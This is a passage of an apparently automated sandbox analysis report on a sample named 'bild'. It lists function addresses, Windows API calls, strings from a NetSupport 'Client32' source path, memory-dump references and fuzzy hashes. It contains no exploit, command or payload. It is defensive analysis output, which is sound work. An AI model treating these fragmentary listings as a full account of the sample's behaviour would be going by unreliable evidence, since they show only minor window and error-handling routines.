                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread__wcstoi64
                                                                                      • String ID: *TapiFixPeriod$Bridge
                                                                                      • API String ID: 1152747075-2058455932
                                                                                      • Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                      • Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
                                                                                      • Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                      • Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766
                                                                                      Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                      • m_hWnd, xrefs: 11001096
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2046328329-2830328467
                                                                                      • Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                      • Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
                                                                                      • Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                      • Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
                                                                                      Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                      • m_hWnd, xrefs: 11001056
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 819365019-2830328467
                                                                                      • Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                      • Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
                                                                                      • Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                      • Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
                                                                                      Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                      • m_hWnd, xrefs: 110010E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 906220102-2830328467
                                                                                      • Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                      • Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
                                                                                      • Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                      • Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
                                                                                      Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                      • m_hWnd, xrefs: 11001126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 1604732272-2830328467
                                                                                      • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                      • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                      • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                      • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                      Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KillTimer.USER32(?,?), ref: 1100102B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                      • m_hWnd, xrefs: 11001016
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2229609774-2830328467
                                                                                      • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                      • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                      • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                      • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                      Function 11143320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncpy
                                                                                      • String ID: 1000,50$1000,50
                                                                                      • API String ID: 2961919466-2776873633
                                                                                      • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                      • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                      • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                      • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                      Function 1110F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                      • API String ID: 2400454052-4183089485
                                                                                      • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                      • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                      • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                      • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88